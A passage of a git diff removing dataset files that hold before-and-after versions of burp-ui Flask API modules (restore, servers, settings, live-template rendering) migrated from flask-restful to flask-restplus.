import api - from ..misc.utils import BUIserverException - - from future.utils import iteritems --from flask.ext.restful import reqparse, Resource, abort -+from flask.ext.restplus import reqparse, Resource, abort - from flask.ext.login import current_user, login_required - from flask import render_template, make_response - diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$misc.py.source.py b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$misc.py.source.py deleted file mode 100644 index 39efe14..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$misc.py.source.py +++ /dev/null @@ -1,84 +0,0 @@ -# -*- coding: utf8 -*- -""" -.. module:: burpui.api.misc - :platform: Unix - :synopsis: Burp-UI misc api module. - -.. moduleauthor:: Ziirish - -""" -# This is a submodule we can also use "from ..api import api" -from . import api -from ..misc.utils import BUIserverException - -from future.utils import iteritems -from flask.ext.restful import reqparse, Resource, abort -from flask.ext.login import current_user, login_required -from flask import render_template, make_response - -import time - - -@api.resource('/api/render-live-template', - '/api//render-live-template', - '/api/render-live-template/', - '/api//render-live-template/', - endpoint='api.render_live_tpl') -class RenderLiveTpl(Resource): - """The :class:`burpui.api.misc.RenderLiveTpl` resource allows you to - render the *live view* template of a given client. - - This resource is part of the :mod:`burpui.api.api` module. - - An optional ``GET`` parameter called ``server`` is supported when running - in multi-agent mode. - A mandatory ``GET`` parameter called ``name`` is used to know what client we - are working on. - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('server', type=str) - self.parser.add_argument('name', type=str) - - @login_required - def get(self, server=None, name=None): - """API: render_live_tpl - :param name: the client name if any. 
You can also use the GET parameter - 'name' to achieve the same thing - :returns: HTML that should be included directly into the page - """ - if not server: - server = self.parser.parse_args()['server'] - if not name: - name = self.parser.parse_args()['name'] - # Check params - if not name: - abort(400, message='No client name provided') - # Manage ACL - if (api.bui.acl and - (not api.bui.acl.is_client_allowed(current_user.get_id(), name, server) or - not api.bui.acl.is_admin(current_user.get_id()))): - abort(403) - # refresh cache if 30 seconds elapsed since last refresh - if not api.bui.cli.refresh or (time.time() - api.bui.cli.refresh > 30): - api.bui.cli.is_one_backup_running() - if isinstance(api.bui.cli.running, dict): - if server and name not in api.bui.cli.running[server]: - abort(404) - else: - found = False - for (k, a) in iteritems(api.bui.cli.running): - found = found or (name in a) - if not found: - abort(404) - else: - if name not in api.bui.cli.running: - abort(404) - try: - counters = api.bui.cli.get_counters(name, agent=server) - except BUIserverException: - counters = [] - response = make_response(render_template('live-monitor-template.html', cname=name, counters=counters, server=server)) - response.headers['content-type'] = 'text/html' - return response diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$misc.py.target.py b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$misc.py.target.py deleted file mode 100644 index 99d1290..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$misc.py.target.py +++ /dev/null @@ -1,84 +0,0 @@ -# -*- coding: utf8 -*- -""" -.. module:: burpui.api.misc - :platform: Unix - :synopsis: Burp-UI misc api module. - -.. moduleauthor:: Ziirish - -""" -# This is a submodule we can also use "from ..api import api" -from . import api -from ..misc.utils import BUIserverException - -from future.utils import iteritems -from flask.ext.restplus import reqparse, Resource, abort -from flask.ext.login import current_user, login_required -from flask import render_template, make_response - -import time - - -@api.resource('/api/render-live-template', - '/api//render-live-template', - '/api/render-live-template/', - '/api//render-live-template/', - endpoint='api.render_live_tpl') -class RenderLiveTpl(Resource): - """The :class:`burpui.api.misc.RenderLiveTpl` resource allows you to - render the *live view* template of a given client. - - This resource is part of the :mod:`burpui.api.api` module. - - An optional ``GET`` parameter called ``server`` is supported when running - in multi-agent mode. - A mandatory ``GET`` parameter called ``name`` is used to know what client we - are working on. - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('server', type=str) - self.parser.add_argument('name', type=str) - - @login_required - def get(self, server=None, name=None): - """API: render_live_tpl - :param name: the client name if any. 
You can also use the GET parameter - 'name' to achieve the same thing - :returns: HTML that should be included directly into the page - """ - if not server: - server = self.parser.parse_args()['server'] - if not name: - name = self.parser.parse_args()['name'] - # Check params - if not name: - abort(400, message='No client name provided') - # Manage ACL - if (api.bui.acl and - (not api.bui.acl.is_client_allowed(current_user.get_id(), name, server) or - not api.bui.acl.is_admin(current_user.get_id()))): - abort(403) - # refresh cache if 30 seconds elapsed since last refresh - if not api.bui.cli.refresh or (time.time() - api.bui.cli.refresh > 30): - api.bui.cli.is_one_backup_running() - if isinstance(api.bui.cli.running, dict): - if server and name not in api.bui.cli.running[server]: - abort(404) - else: - found = False - for (k, a) in iteritems(api.bui.cli.running): - found = found or (name in a) - if not found: - abort(404) - else: - if name not in api.bui.cli.running: - abort(404) - try: - counters = api.bui.cli.get_counters(name, agent=server) - except BUIserverException: - counters = [] - response = make_response(render_template('live-monitor-template.html', cname=name, counters=counters, server=server)) - response.headers['content-type'] = 'text/html' - return response diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$restore.py.diff b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$restore.py.diff deleted file mode 100644 index 80bb322..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$restore.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/burpui/api/restore.py b/burpui/api/restore.py - index 66f580a4db8b186e9e8658c6ed487fa89cc4a4ec..8ef3b624e52ac6a9420c533b0dd744a36d91c4d3 100644 - --- a/burpui/api/restore.py - +++ b/burpui/api/restore.py -@@ -15,7 +15,7 @@ from time import gmtime, strftime, time - # This is a submodule we can also use "from ..api import api" - from . import api - from ..misc.utils import BUIserverException --from flask.ext.restful import reqparse, Resource, abort -+from flask.ext.restplus import reqparse, Resource, abort - from flask.ext.login import current_user, login_required - from flask import Response, send_file, make_response, after_this_request - from werkzeug.datastructures import Headers diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$restore.py.source.py b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$restore.py.source.py deleted file mode 100644 index d925e64..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$restore.py.source.py +++ /dev/null @@ -1,255 +0,0 @@ -# -*- coding: utf8 -*- -""" -.. module:: burpui.api.restore - :platform: Unix - :synopsis: Burp-UI restore api module. - -.. moduleauthor:: Ziirish - -""" -import select - -from zlib import adler32 -from time import gmtime, strftime, time - -# This is a submodule we can also use "from ..api import api" -from . import api -from ..misc.utils import BUIserverException -from flask.ext.restful import reqparse, Resource, abort -from flask.ext.login import current_user, login_required -from flask import Response, send_file, make_response, after_this_request -from werkzeug.datastructures import Headers -from werkzeug.exceptions import HTTPException - - -@api.resource('/api/restore//', - '/api//restore//', - endpoint='api.restore') -class Restore(Resource): - """The :class:`burpui.api.restore.Restore` resource allows you to - perform a file restoration. 
- - This resource is part of the :mod:`burpui.api.restore` module. - - The following parameters are supported: - - ``list``: list of files/directories to restore - - ``strip``: number of elements to strip in the path - - ``format``: returning archive format - - ``pass``: password to use for encrypted backups - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('list', type=str) - self.parser.add_argument('strip', type=str) - self.parser.add_argument('format', type=str) - self.parser.add_argument('pass', type=str) - - @login_required - def post(self, server=None, name=None, backup=None): - """**POST** method provided by the webservice. - This method returns a :mod:`flask.Response` object. - - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :param name: The client we are working on - :type name: str - - :param backup: The backup we are working on - :type backup: int - - :returns: A :mod:`flask.Response` object representing an archive of the restored files - """ - args = self.parser.parse_args() - l = args['list'] - s = args['strip'] - f = args['format'] - p = args['pass'] - resp = None - if not f: - f = 'zip' - # Check params - if not l or not name or not backup: - abort(400, message='missing arguments') - # Manage ACL - if (api.bui.acl and - (not api.bui.acl.is_client_allowed(current_user.get_id(), - name, - server) and not - api.bui.acl.is_admin(current_user.get_id()))): - abort(403) - if server: - filename = 'restoration_%d_%s_on_%s_at_%s.%s' % ( - backup, - name, - server, - strftime("%Y-%m-%d_%H_%M_%S", gmtime()), - f) - else: - filename = 'restoration_%d_%s_at_%s.%s' % ( - backup, - name, - strftime("%Y-%m-%d_%H_%M_%S", gmtime()), - f) - if not server: - # Standalone mode, we can just return the file unless there were errors - archive, err = api.bui.cli.restore_files(name, backup, l, s, f, p) - if not archive: - if err: - return make_response(err, 500) - abort(500) - try: - # Trick to delete the file while sending it to the client. - # First, we open the file in reading mode so that a file handler - # is open on the file. Then we delete it as soon as the request - # ended. Because the fh is open, the file will be actually removed - # when the transfert is done and the send_file method has closed - # the fh. - fh = open(archive, 'r') - - @after_this_request - def remove_file(response): - """Callback function to run after the client has handled - the request to remove temporary files. - """ - import os - os.remove(archive) - return response - resp = send_file(fh, - as_attachment=True, - attachment_filename=filename, - mimetype='application/zip') - resp.set_cookie('fileDownload', 'true') - except Exception as e: - api.bui.cli._logger('error', str(e)) - abort(500) - else: - # Multi-agent mode - socket = None - try: - socket, length, err = api.bui.cli.restore_files(name, - backup, - l, - s, - f, - p, - server) - api.bui.cli._logger('debug', 'Need to get {} Bytes : {}'.format(length, socket)) - - if err: - api.bui.cli._logger('debug', 'Something went wrong: {}'.format(err)) - socket.close() - return make_response(err, 500) - - def stream_file(sock, l): - """The restoration took place on another server so we need - to stream the file that is not present on the current - machine. 
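The "trick" commented in the standalone branch above relies on POSIX unlink semantics: an unlinked file's data stays readable for as long as any descriptor on it remains open, so deleting in the after-request hook only reclaims the blocks once `send_file` has drained the handle. A minimal sketch of the same pattern in current Flask (`download_name` replaced `attachment_filename` in Flask 2.0; the path and route here are illustrative):

import os
from flask import Flask, after_this_request, send_file

app = Flask(__name__)

@app.route('/download')
def download():
    archive = '/tmp/restoration.zip'  # illustrative; burp-ui gets this path from the burp client
    fh = open(archive, 'rb')  # binary mode; the era's 'r' only worked because Python 2 did not decode

    @after_this_request
    def remove_file(response):
        os.remove(archive)  # the open fh keeps the data readable until send_file closes it
        return response

    return send_file(fh, as_attachment=True, download_name='restoration.zip',
                     mimetype='application/zip')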
- """ - bsize = 1024 - received = 0 - if l < bsize: - bsize = l - while received < l: - buf = b'' - r, _, _ = select.select([sock], [], [], 5) - if not r: - raise Exception('Socket timed-out') - buf += sock.recv(bsize) - if not buf: - continue - received += len(buf) - api.bui.cli._logger('debug', '{}/{}'.format(received, l)) - yield buf - sock.close() - - headers = Headers() - headers.add('Content-Disposition', - 'attachment', - filename=filename) - headers['Content-Length'] = length - - resp = Response(stream_file(socket, length), - mimetype='application/zip', - headers=headers, - direct_passthrough=True) - resp.set_cookie('fileDownload', 'true') - resp.set_etag('flask-%s-%s-%s' % ( - time(), - length, - adler32(filename.encode('utf-8')) & 0xffffffff)) - except HTTPException as e: - raise e - except Exception as e: - api.bui.cli._logger('error', str(e)) - abort(500) - return resp - - -@api.resource('/api/schedule-restore//', - '/api//schedule-restore//', - endpoint='api.schedule_restore') -class ScheduleRestore(Resource): - """The :class:`burpui.api.restore.ScheduleRestore` resource allows you to - prepare a file restoration. - - This resource is part of the :mod:`burpui.api.restore` module. - - The following parameters are supported: - - ``list``: list of files/directories to restore - - ``strip``: number of elements to strip in the path - - ``prefix``: prefix to the restore path - - ``force``: whether to overwrite existing files - - ``restore_to``: restore files on an other client - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('list-sc', type=str) - self.parser.add_argument('strip-sc', type=str) - self.parser.add_argument('prefix-sc', type=str) - self.parser.add_argument('force-sc', type=str) - self.parser.add_argument('restoreto-sc', type=str) - - @login_required - def put(self, server=None, name=None, backup=None): - """**PUT** method provided by the webservice. - - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :param name: The client we are working on - :type name: str - - :param backup: The backup we are working on - :type backup: int - - :returns: Status message (success or failure) - """ - args = self.parser.parse_args() - l = args['list-sc'] - s = args['strip-sc'] - p = args['prefix-sc'] - f = args['force-sc'] - to = args['restoreto-sc'] - j = [] - err = [] - # Check params - if not l or not name or not backup: - err.append([2, 'Missing options']) - return {'notif': err}, 400 - # Manage ACL - if (api.bui.acl and - (not api.bui.acl.is_client_allowed(current_user.get_id(), - name, - server) and not - api.bui.acl.is_admin(current_user.get_id()))): - err.append([2, 'You are not allowed to perform a restoration for this client']) - return {'notif': err}, 403 - try: - j = api.bui.cli.schedule_restore(name, backup, l, s, f, p, to, server) - return {'notif': j}, 200 - except BUIserverException as e: - err.append([2, str(e)]) - return {'notif': err}, 500 diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$restore.py.target.py b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$restore.py.target.py deleted file mode 100644 index 07a1b83..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$restore.py.target.py +++ /dev/null @@ -1,255 +0,0 @@ -# -*- coding: utf8 -*- -""" -.. module:: burpui.api.restore - :platform: Unix - :synopsis: Burp-UI restore api module. - -.. 
moduleauthor:: Ziirish - -""" -import select - -from zlib import adler32 -from time import gmtime, strftime, time - -# This is a submodule we can also use "from ..api import api" -from . import api -from ..misc.utils import BUIserverException -from flask.ext.restplus import reqparse, Resource, abort -from flask.ext.login import current_user, login_required -from flask import Response, send_file, make_response, after_this_request -from werkzeug.datastructures import Headers -from werkzeug.exceptions import HTTPException - - -@api.resource('/api/restore//', - '/api//restore//', - endpoint='api.restore') -class Restore(Resource): - """The :class:`burpui.api.restore.Restore` resource allows you to - perform a file restoration. - - This resource is part of the :mod:`burpui.api.restore` module. - - The following parameters are supported: - - ``list``: list of files/directories to restore - - ``strip``: number of elements to strip in the path - - ``format``: returning archive format - - ``pass``: password to use for encrypted backups - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('list', type=str) - self.parser.add_argument('strip', type=str) - self.parser.add_argument('format', type=str) - self.parser.add_argument('pass', type=str) - - @login_required - def post(self, server=None, name=None, backup=None): - """**POST** method provided by the webservice. - This method returns a :mod:`flask.Response` object. - - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :param name: The client we are working on - :type name: str - - :param backup: The backup we are working on - :type backup: int - - :returns: A :mod:`flask.Response` object representing an archive of the restored files - """ - args = self.parser.parse_args() - l = args['list'] - s = args['strip'] - f = args['format'] - p = args['pass'] - resp = None - if not f: - f = 'zip' - # Check params - if not l or not name or not backup: - abort(400, message='missing arguments') - # Manage ACL - if (api.bui.acl and - (not api.bui.acl.is_client_allowed(current_user.get_id(), - name, - server) and not - api.bui.acl.is_admin(current_user.get_id()))): - abort(403) - if server: - filename = 'restoration_%d_%s_on_%s_at_%s.%s' % ( - backup, - name, - server, - strftime("%Y-%m-%d_%H_%M_%S", gmtime()), - f) - else: - filename = 'restoration_%d_%s_at_%s.%s' % ( - backup, - name, - strftime("%Y-%m-%d_%H_%M_%S", gmtime()), - f) - if not server: - # Standalone mode, we can just return the file unless there were errors - archive, err = api.bui.cli.restore_files(name, backup, l, s, f, p) - if not archive: - if err: - return make_response(err, 500) - abort(500) - try: - # Trick to delete the file while sending it to the client. - # First, we open the file in reading mode so that a file handler - # is open on the file. Then we delete it as soon as the request - # ended. Because the fh is open, the file will be actually removed - # when the transfert is done and the send_file method has closed - # the fh. - fh = open(archive, 'r') - - @after_this_request - def remove_file(response): - """Callback function to run after the client has handled - the request to remove temporary files. 
- """ - import os - os.remove(archive) - return response - resp = send_file(fh, - as_attachment=True, - attachment_filename=filename, - mimetype='application/zip') - resp.set_cookie('fileDownload', 'true') - except Exception as e: - api.bui.cli._logger('error', str(e)) - abort(500) - else: - # Multi-agent mode - socket = None - try: - socket, length, err = api.bui.cli.restore_files(name, - backup, - l, - s, - f, - p, - server) - api.bui.cli._logger('debug', 'Need to get {} Bytes : {}'.format(length, socket)) - - if err: - api.bui.cli._logger('debug', 'Something went wrong: {}'.format(err)) - socket.close() - return make_response(err, 500) - - def stream_file(sock, l): - """The restoration took place on another server so we need - to stream the file that is not present on the current - machine. - """ - bsize = 1024 - received = 0 - if l < bsize: - bsize = l - while received < l: - buf = b'' - r, _, _ = select.select([sock], [], [], 5) - if not r: - raise Exception('Socket timed-out') - buf += sock.recv(bsize) - if not buf: - continue - received += len(buf) - api.bui.cli._logger('debug', '{}/{}'.format(received, l)) - yield buf - sock.close() - - headers = Headers() - headers.add('Content-Disposition', - 'attachment', - filename=filename) - headers['Content-Length'] = length - - resp = Response(stream_file(socket, length), - mimetype='application/zip', - headers=headers, - direct_passthrough=True) - resp.set_cookie('fileDownload', 'true') - resp.set_etag('flask-%s-%s-%s' % ( - time(), - length, - adler32(filename.encode('utf-8')) & 0xffffffff)) - except HTTPException as e: - raise e - except Exception as e: - api.bui.cli._logger('error', str(e)) - abort(500) - return resp - - -@api.resource('/api/schedule-restore//', - '/api//schedule-restore//', - endpoint='api.schedule_restore') -class ScheduleRestore(Resource): - """The :class:`burpui.api.restore.ScheduleRestore` resource allows you to - prepare a file restoration. - - This resource is part of the :mod:`burpui.api.restore` module. - - The following parameters are supported: - - ``list``: list of files/directories to restore - - ``strip``: number of elements to strip in the path - - ``prefix``: prefix to the restore path - - ``force``: whether to overwrite existing files - - ``restore_to``: restore files on an other client - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('list-sc', type=str) - self.parser.add_argument('strip-sc', type=str) - self.parser.add_argument('prefix-sc', type=str) - self.parser.add_argument('force-sc', type=str) - self.parser.add_argument('restoreto-sc', type=str) - - @login_required - def put(self, server=None, name=None, backup=None): - """**PUT** method provided by the webservice. 
- - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :param name: The client we are working on - :type name: str - - :param backup: The backup we are working on - :type backup: int - - :returns: Status message (success or failure) - """ - args = self.parser.parse_args() - l = args['list-sc'] - s = args['strip-sc'] - p = args['prefix-sc'] - f = args['force-sc'] - to = args['restoreto-sc'] - j = [] - err = [] - # Check params - if not l or not name or not backup: - err.append([2, 'Missing options']) - return {'notif': err}, 400 - # Manage ACL - if (api.bui.acl and - (not api.bui.acl.is_client_allowed(current_user.get_id(), - name, - server) and not - api.bui.acl.is_admin(current_user.get_id()))): - err.append([2, 'You are not allowed to perform a restoration for this client']) - return {'notif': err}, 403 - try: - j = api.bui.cli.schedule_restore(name, backup, l, s, f, p, to, server) - return {'notif': j}, 200 - except BUIserverException as e: - err.append([2, str(e)]) - return {'notif': err}, 500 diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$servers.py.diff b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$servers.py.diff deleted file mode 100644 index 44b227d..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$servers.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/burpui/api/servers.py b/burpui/api/servers.py - index 66f580a4db8b186e9e8658c6ed487fa89cc4a4ec..8ef3b624e52ac6a9420c533b0dd744a36d91c4d3 100644 - --- a/burpui/api/servers.py - +++ b/burpui/api/servers.py -@@ -5,7 +5,7 @@ from . import api - from ..misc.utils import BUIserverException - - from future.utils import iteritems --from flask.ext.restful import reqparse, Resource -+from flask.ext.restplus import reqparse, Resource - from flask.ext.login import current_user, login_required - from flask import jsonify - diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$servers.py.source.py b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$servers.py.source.py deleted file mode 100644 index ae9fb7a..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$servers.py.source.py +++ /dev/null @@ -1,97 +0,0 @@ -# -*- coding: utf8 -*- - -# This is a submodule we can also use "from ..api import api" -from . import api -from ..misc.utils import BUIserverException - -from future.utils import iteritems -from flask.ext.restful import reqparse, Resource -from flask.ext.login import current_user, login_required -from flask import jsonify - - -@api.resource('/api/servers.json', endpoint='api.servers_stats') -class ServersStats(Resource): - """The :class:`burpui.api.servers.ServersStats` resource allows you to - retrieve statistics about servers/agents. - - This resource is part of the :mod:`burpui.api.servers` module. 
- """ - - @login_required - def get(self): - r = [] - if hasattr(api.bui.cli, 'servers'): # pragma: no cover - check = False - allowed = [] - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - check = True - allowed = api.bui.acl.servers(current_user.get_id()) - for serv in api.bui.cli.servers: - try: - if check: - if serv in allowed: - r.append({'name': serv, - 'clients': len(api.bui.cli.servers[serv].get_all_clients(serv)), - 'alive': api.bui.cli.servers[serv].ping()}) - else: - r.append({'name': serv, - 'clients': len(api.bui.cli.servers[serv].get_all_clients(serv)), - 'alive': api.bui.cli.servers[serv].ping()}) - except BUIserverException as e: - err = [[2, str(e)]] - return jsonify(notif=err) - return jsonify(results=r) - - -@api.resource('/api/live.json', - '/api//live.json', - endpoint='api.live') -class Live(Resource): - """The :class:`burpui.api.servers.Live` resource allows you to - retrieve a list of servers that are currently *alive*. - - This resource is part of the :mod:`burpui.api.servers` module. - - An optional ``GET`` parameter called ``server`` is supported when running - in multi-agent mode. - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('server', type=str) - - @login_required - def get(self, server=None): - """API: live - :returns: the live status of the server - """ - if not server: - server = self.parser.parse_args()['server'] - r = [] - if server: - l = (api.bui.cli.is_one_backup_running(server))[server] - else: - l = api.bui.cli.is_one_backup_running() - if isinstance(l, dict): # pragma: no cover - for (k, a) in iteritems(l): - for c in a: - s = {} - s['client'] = c - s['agent'] = k - try: - s['status'] = api.bui.cli.get_counters(c, agent=k) - except BUIserverException: - s['status'] = [] - r.append(s) - else: # pragma: no cover - for c in l: - s = {} - s['client'] = c - try: - s['status'] = api.bui.cli.get_counters(c, agent=server) - except BUIserverException: - s['status'] = [] - r.append(s) - return jsonify(results=r) diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$servers.py.target.py b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$servers.py.target.py deleted file mode 100644 index 1462435..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$servers.py.target.py +++ /dev/null @@ -1,97 +0,0 @@ -# -*- coding: utf8 -*- - -# This is a submodule we can also use "from ..api import api" -from . import api -from ..misc.utils import BUIserverException - -from future.utils import iteritems -from flask.ext.restplus import reqparse, Resource -from flask.ext.login import current_user, login_required -from flask import jsonify - - -@api.resource('/api/servers.json', endpoint='api.servers_stats') -class ServersStats(Resource): - """The :class:`burpui.api.servers.ServersStats` resource allows you to - retrieve statistics about servers/agents. - - This resource is part of the :mod:`burpui.api.servers` module. 
- """ - - @login_required - def get(self): - r = [] - if hasattr(api.bui.cli, 'servers'): # pragma: no cover - check = False - allowed = [] - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - check = True - allowed = api.bui.acl.servers(current_user.get_id()) - for serv in api.bui.cli.servers: - try: - if check: - if serv in allowed: - r.append({'name': serv, - 'clients': len(api.bui.cli.servers[serv].get_all_clients(serv)), - 'alive': api.bui.cli.servers[serv].ping()}) - else: - r.append({'name': serv, - 'clients': len(api.bui.cli.servers[serv].get_all_clients(serv)), - 'alive': api.bui.cli.servers[serv].ping()}) - except BUIserverException as e: - err = [[2, str(e)]] - return jsonify(notif=err) - return jsonify(results=r) - - -@api.resource('/api/live.json', - '/api//live.json', - endpoint='api.live') -class Live(Resource): - """The :class:`burpui.api.servers.Live` resource allows you to - retrieve a list of servers that are currently *alive*. - - This resource is part of the :mod:`burpui.api.servers` module. - - An optional ``GET`` parameter called ``server`` is supported when running - in multi-agent mode. - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('server', type=str) - - @login_required - def get(self, server=None): - """API: live - :returns: the live status of the server - """ - if not server: - server = self.parser.parse_args()['server'] - r = [] - if server: - l = (api.bui.cli.is_one_backup_running(server))[server] - else: - l = api.bui.cli.is_one_backup_running() - if isinstance(l, dict): # pragma: no cover - for (k, a) in iteritems(l): - for c in a: - s = {} - s['client'] = c - s['agent'] = k - try: - s['status'] = api.bui.cli.get_counters(c, agent=k) - except BUIserverException: - s['status'] = [] - r.append(s) - else: # pragma: no cover - for c in l: - s = {} - s['client'] = c - try: - s['status'] = api.bui.cli.get_counters(c, agent=server) - except BUIserverException: - s['status'] = [] - r.append(s) - return jsonify(results=r) diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$settings.py.diff b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$settings.py.diff deleted file mode 100644 index 10e9d0d..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$settings.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/burpui/api/settings.py b/burpui/api/settings.py - index 66f580a4db8b186e9e8658c6ed487fa89cc4a4ec..8ef3b624e52ac6a9420c533b0dd744a36d91c4d3 100644 - --- a/burpui/api/settings.py - +++ b/burpui/api/settings.py -@@ -11,7 +11,7 @@ import sys - - # This is a submodule we can also use "from ..api import api" - from . import api --from flask.ext.restful import reqparse, abort, Resource -+from flask.ext.restplus import reqparse, abort, Resource - from flask.ext.login import current_user, login_required - from flask import jsonify, request, url_for - from werkzeug.datastructures import ImmutableMultiDict diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$settings.py.source.py b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$settings.py.source.py deleted file mode 100644 index 1eb6bef..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$settings.py.source.py +++ /dev/null @@ -1,311 +0,0 @@ -# -*- coding: utf8 -*- -""" -.. module:: burpui.api.settings - :platform: Unix - :synopsis: Burp-UI settings api module. - -.. 
moduleauthor:: Ziirish - -""" -import sys - -# This is a submodule we can also use "from ..api import api" -from . import api -from flask.ext.restful import reqparse, abort, Resource -from flask.ext.login import current_user, login_required -from flask import jsonify, request, url_for -from werkzeug.datastructures import ImmutableMultiDict -if sys.version_info >= (3, 0): - from urllib.parse import unquote -else: - from urllib import unquote - - -@api.resource('/api/settings/server-config', - '/api//settings/server-config', - '/api/settings/server-config/', - '/api//settings/server-config/', - endpoint='api.server_settings') -class ServerSettings(Resource): - """The :class:`burpui.api.settings.ServerSettings` resource allows you to - read and write the server's configuration. - - This resource is part of the :mod:`burpui.api.settings` module. - """ - - @login_required - def post(self, conf=None, server=None): - noti = api.bui.cli.store_conf_srv(request.form, conf, server) - return {'notif': noti}, 200 - - @login_required - def get(self, conf=None, server=None): - """**GET** method provided by the webservice. - - The *JSON* returned is: - :: - - { - "boolean": [ - "daemon", - "fork", - "..." - ], - "defaults": { - "address": "", - "autoupgrade_dir": "", - "ca_burp_ca": "", - "ca_conf": "", - "ca_name": "", - "ca_server_name": "", - "client_can_delete": true, - "...": "..." - }, - "integer": [ - "port", - "status_port", - "..." - ], - "multi": [ - "keep", - "restore_client", - "..." - ], - "placeholders": { - "autoupgrade_dir": "path", - "ca_burp_ca": "path", - "ca_conf": "path", - "ca_name": "name", - "ca_server_name": "name", - "client_can_delete": "0|1", - "...": "..." - }, - "results": { - "boolean": [ - { - "name": "hardlinked_archive", - "value": false - }, - { - "name": "syslog", - "value": true - }, - { "...": "..." } - ], - "clients": [ - { - "name": "testclient", - "value": "/etc/burp/clientconfdir/testclient" - } - ], - "common": [ - { - "name": "mode", - "value": "server" - }, - { - "name": "directory", - "value": "/var/spool/burp" - }, - { "...": "..." } - ], - "includes": [], - "includes_ext": [], - "integer": [ - { - "name": "port", - "value": 4971 - }, - { - "name": "status_port", - "value": 4972 - }, - { "...": "..." } - ], - "multi": [ - { - "name": "keep", - "value": [ - "7", - "4" - ] - }, - { "...": "..." } - ] - }, - "server_doc": { - "address": "Defines the main TCP address that the server listens on. The default is either '::' or '0.0.0.0', dependent upon compile time options.", - "...": "..." - }, - "string": [ - "mode", - "address", - "..." - ], - "suggest": { - "compression": [ - "gzip1", - "gzip2", - "gzip3", - "gzip4", - "gzip5", - "gzip6", - "gzip7", - "gzip8", - "gzip9" - ], - "mode": [ - "client", - "server" - ], - "...": [] - } - } - - - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :returns: The *JSON* described above. 
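The version-gated import above (`urllib.parse.unquote` on Python 3, `urllib.unquote` on Python 2) is the standard dependency-free compatibility shim of the era; targeting Python 3 alone it reduces to one line:

from urllib.parse import unquote

print(unquote('clientconfdir%2Ftestclient'))  # -> clientconfdir/testclient

Relatedly, the bare `except: pass` guarding `unquote(conf)` further down exists to tolerate `conf is None`; an explicit `if conf is not None:` check would say the same thing without swallowing every other error.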
- """ - # Only the admin can edit the configuration - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - abort(403, message='Sorry, you don\'t have rights to access the setting panel') - - try: - conf = unquote(conf) - except: - pass - r = api.bui.cli.read_conf_srv(conf, server) - return jsonify(results=r, - boolean=api.bui.cli.get_parser_attr('boolean_srv', server), - string=api.bui.cli.get_parser_attr('string_srv', server), - integer=api.bui.cli.get_parser_attr('integer_srv', server), - multi=api.bui.cli.get_parser_attr('multi_srv', server), - server_doc=api.bui.cli.get_parser_attr('doc', server), - suggest=api.bui.cli.get_parser_attr('values', server), - placeholders=api.bui.cli.get_parser_attr('placeholders', server), - defaults=api.bui.cli.get_parser_attr('defaults', server)) - - -@api.resource('/api/settings/clients.json', - '/api//settings/clients.json', - endpoint='api.clients_list') -class ClientsList(Resource): - - @login_required - def get(self, server=None): - res = api.bui.cli.clients_list(server) - return jsonify(result=res) - - -@api.resource('/api/settings//client-config', - '/api/settings//client-config/', - '/api//settings//client-config', - '/api//settings//client-config/', - endpoint='api.client_settings') -class ClientSettings(Resource): - - @login_required - def post(self, server=None, client=None, conf=None): - noti = api.bui.cli.store_conf_cli(request.form, client, conf, server) - return jsonify(notif=noti) - - @login_required - def get(self, server=None, client=None, 